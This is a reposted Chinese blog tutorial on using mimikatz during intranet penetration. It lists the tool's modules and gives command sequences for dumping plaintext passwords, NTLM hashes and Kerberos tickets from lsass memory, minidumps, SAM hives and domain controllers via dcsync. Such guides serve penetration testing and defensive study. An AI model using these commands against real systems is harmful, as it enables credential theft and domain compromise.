安全-内网渗透中mimikatz使用方法

Posted 小狐狸FM

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了安全-内网渗透中mimikatz使用方法相关的知识,希望对你有一定的参考价值。

前言

此文章为转载,略加修改并非原创

原帖

mimikatz-github

mimikatz-windows使用指南

一、简介

Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe进程中获取当前登录系统用户名的密码,

lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中

经过其 wdigesttspkg 两个模块调用后,对其使用可逆算法进行加密并存储在内存之中, 而 mimikatz 正是通过对lsass逆算获取到明文密码!也就是说只要你不重启电脑,就可以通过他获取到登陆密码,只限当前登陆系统!

二、命令

命令介绍
acrACR模块
busylightBusyLight Module
cls清屏
crypto加密相关模块
dpapiDPAPI模块(通过API或RAW访问)[数据保护应用程序编程接口]
exit退出
event事件模块
iisIIS XML配置模块
lsadumpLsaDump模块
nogpo::cmd打开系统的cmd.exe
nogpo::regedit打开系统的注册表
nogpo::taskmgr打开任务管理器
misc杂项模块
minesweeperMine Sweeper模块
sekurlsa与证书相关的模块
standard标准模块,基本命令
kerberoskerberos模块
privilege提权相关模块
privilege::debug提升权限
privilege::enable激活一个或多个权限,提升权限
privilege::list列出权限列表
process进程相关模块
process::list列出进程
process::modules列出系统的核心模块及所在位置
process::stop 进程名称结束进程
process::suspend进程名称暂停进程
rdmRDM(830AL)器件的射频模块
rpcmimikatz的RPC控制
serivce服务相关模块
service::list列出系统的服务
service::remove移除系统的服务
service::start 服务名称启动服务
service::stop 服务名称停止服务
sid安全标识符模块
sr98用于SR98设备和T5577目标的RF模块
sysenv系统环境值模块
system::computer查看计算机名称
system::user查看当前登录的系统用户
sekurlsa::logonPasswords获登陆用户信息及密码
sekurlsa::tspkg获取tspkg用户信息及密码
system::user查看当前登录的系统用户
sekurlsa::wdigest获取本地用户信息及密码
token令牌操作模块
ts终端服务器模块
ts::processes显示进程和对应的pid情况等
ts::sessions显示当前的会话
vaultWindows 、证书模块
version查看版本

三、准备

mimikatz # log
mimikatz # privilege::debug   //提升权限(不是administrator,debug会失败)

四、抓取明文密码

mimikatz #log
mimikatz #privilege::debug
mimikatz #sekurlsa::logonpasswords

但是在安装了KB2871997补丁或者系统版本大于windows server 2012时,系统的内存中就不再保存明文的密码,这样利用mimikatz就不能从内存中读出明文密码了。mimikatz的使用需要administrator用户执行,administrators中的其他用户都不行,所以我们这里用administrator权限启动mimikatz

msv:是账户对于的密码的各种加密协议的密文,这里有LM、NTLM和SHA1加密的密文

tspkg,wdigest,kerberos:是账户的明文密码了。(这里显示为null,是应为版本大于2012)

SSP:是最新登陆到其他RDP终端的账户和密码

五、模块使用

[1].sekurlsa模块

sekurlsa::logonpasswords  //获取登录用户信息及密码

抓取用户NTLM哈希
sekurlsa::msv

加载dmp文件,并导出其中的明文密码
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords full

导出lsass.exe进程中所有的票据
sekurlsa::tickets /export

[2].kerberos模块

列出系统中的票据
kerberos::list
kerberos::tgt

清除系统中的票据
kerberos::purge

导入票据到系统中
kerberos::ptc 票据路径

[3].lsadump模块

在域控上执行)查看域kevin.com内指定用户root的详细信息,包括NTLM哈希等
lsadump::dcsync /domain:kevin.com /user:root

(在域控上执行)读取所有域用户的哈希
lsadump::lsa /patch

从sam.hive和system.hive文件中获得NTLM Hash
lsadump::sam /sam:sam.hive /system:system.hive

从本地SAM文件中读取密码哈希
token::elevate
lsadump::sam

以上是关于安全-内网渗透中mimikatz使用方法的主要内容,如果未能解决你的问题,请参考以下文章

内网渗透-常用工具免杀

内网渗透-完整的域渗透

纯干货-内网渗透系列教程——NTLM 与 NTLM 身份认证

网安学习-内网渗透3

内网渗透测试小Demo-哈希传递攻击

《内网安全攻防:渗透测试实战指南》读书笔记:内网渗透测试基础